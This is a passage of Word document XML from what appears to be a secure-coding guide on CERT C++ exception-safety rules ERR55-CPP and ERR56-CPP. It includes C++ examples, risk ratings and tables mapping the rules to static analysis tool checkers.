                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(tmp, rhs.array, rhs.nElems * </w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(*array));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D5A7C6A"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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1363F382"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>delete</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>[] array;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C818595"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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>array = tmp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FEEB0A6"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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>nElems = rhs.nElems;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52FB8C2C"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>this</w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="173D52D9"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0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26A000A9"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63462537" w14:textId="77777777" w:rsidR="003A7CF9"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B81CDBB" w14:textId="7B7E19B8" w:rsidR="00F72634" w:rsidRPr="003A7CF9" w:rsidRDefault="003A7CF9" w:rsidP="003A7CF9">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A7CF9">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>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99A55AE" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D5BFE3" w14:textId="3EF85627" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r>
              <w:t>Practice Defense in Depth-</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D01753">
              <w:t>Errors should not only be reported using exceptions as one layer of defense, but another layer that would be beneficial is for the operation to terminate if an exception is thrown; this further strengthens exception safety.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00B40BD2" w14:textId="6ECA1DAE" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>(2) Heed Compiler Warnings-</w:t>
            </w:r>
            <w:r w:rsidR="00D01753">
              <w:t xml:space="preserve"> Thrown exceptions should not leave a program in an indeterminate state; all exceptions must be handled. If a warning appears that suggests this could occur, it should be </w:t>
            </w:r>
            <w:r w:rsidR="00AD032F">
              <w:t>heeded,</w:t>
            </w:r>
            <w:r w:rsidR="00D01753">
              <w:t xml:space="preserve"> and code should be modified.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56D5515" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F2670C9" w14:textId="5934206C" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40C1B5AC" w14:textId="6FC0D84E" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62635B7A" w14:textId="526F1E77" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18B948EA" w14:textId="23AF96E1" w:rsidR="00B475A1" w:rsidRDefault="00267F7F"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ADF4A51" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CodeSonar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="348AB2BC" w14:textId="264FEAB9" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7.1p0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47F79C0E" w14:textId="2EADCF9B" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ALLOC.LEAK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="012AA30D" w14:textId="44E390BA" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Leak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="415234C8" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C940DF2" w14:textId="2A190123" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Parasoft C/C++test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76E7C4D8" w14:textId="0A4BCB3A" w:rsidR="00B475A1" w:rsidRDefault="00267F7F" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34777AB2" w14:textId="2010B2CC" w:rsidR="00B475A1" w:rsidRPr="00275C69" w:rsidRDefault="00275C69" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00275C69">
              <w:t>CERT_CPP-ERR56-a</w:t>
            </w:r>
            <w:r w:rsidRPr="00275C69">
              <w:br/>
              <w:t>CERT_CPP-ERR56-b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66AACB9D" w14:textId="5EAB90EC" w:rsidR="00B475A1" w:rsidRDefault="00275C69" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00275C69">
              <w:t>Always catch exceptions</w:t>
            </w:r>
            <w:r w:rsidRPr="00275C69">
              <w:br/>
              <w:t>Do not leave 'catch' blocks empty</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="177EE248" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09BFA1F8" w14:textId="4A774667" w:rsidR="00B475A1" w:rsidRDefault="00275C69" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Polyspace Bug Finder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17B55B3F" w14:textId="5E78E183" w:rsidR="00B475A1" w:rsidRDefault="00275C69" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>R2022b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="237A438D" w14:textId="26711D8E" w:rsidR="00B475A1" w:rsidRDefault="00275C69" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CERT C++: ERR56-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="247E2C86" w14:textId="72BBF9AD" w:rsidR="00B475A1" w:rsidRDefault="00275C69" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00275C69">
              <w:t>Checks for exceptions violating class invariant (rule fully covered).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="4FD06851" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79BB9036" w14:textId="7E73FD01" w:rsidR="00B475A1" w:rsidRDefault="00275C69" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Helix QAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B986054" w14:textId="5E2B06A4" w:rsidR="00B475A1" w:rsidRDefault="00275C69" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5786EE5E" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00275C69" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>C++4075,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FB441F9" w14:textId="237D5EAC" w:rsidR="00275C69" w:rsidRDefault="00275C69" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>C++4076</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11539D90" w14:textId="1BA5BF0F"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0239CE1" w:rsidR="00B475A1" w:rsidRPr="00492D52" w:rsidRDefault="00EF3F66" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C9484A9" w14:textId="2779BF2C" w:rsidR="00B475A1" w:rsidRDefault="00EF3F66" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ERR55-C</w:t>
            </w:r>
            <w:r w:rsidR="007864CE">
              <w:t>PP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48B2377D" w14:textId="247C0EF3" w:rsidR="00B475A1" w:rsidRDefault="00EF3F66" w:rsidP="00F51FA8">
            <w:r w:rsidRPr="00EF3F66">
              <w:t>Honor exception specifications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9F04A35" w:rsidR="00F72634" w:rsidRDefault="00D75159" w:rsidP="0015146B">
            <w:r>
              <w:t>This function is declared as nonthrowing, but it is possible that std::vector::resize() throws an exception if the requested memory cannot be allocated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="1F240B56" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E371A80" w14:textId="77777777" w:rsidR="00D75159" w:rsidRPr="00D75159" w:rsidRDefault="00D75159" w:rsidP="00D75159">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;cstddef&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63006608" w14:textId="77777777" w:rsidR="00D75159" w:rsidRPr="00D75159" w:rsidRDefault="00D75159" w:rsidP="00D75159">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;vector&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21573EB7" w14:textId="77777777" w:rsidR="00D75159" w:rsidRPr="00D75159" w:rsidRDefault="00D75159" w:rsidP="00D75159">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B0DA4FC" w14:textId="77777777" w:rsidR="00D75159" w:rsidRPr="00D75159" w:rsidRDefault="00D75159" w:rsidP="00D75159">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f(std::vector&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt; &amp;v, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>s) noexcept(</w:t>
            </w:r>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
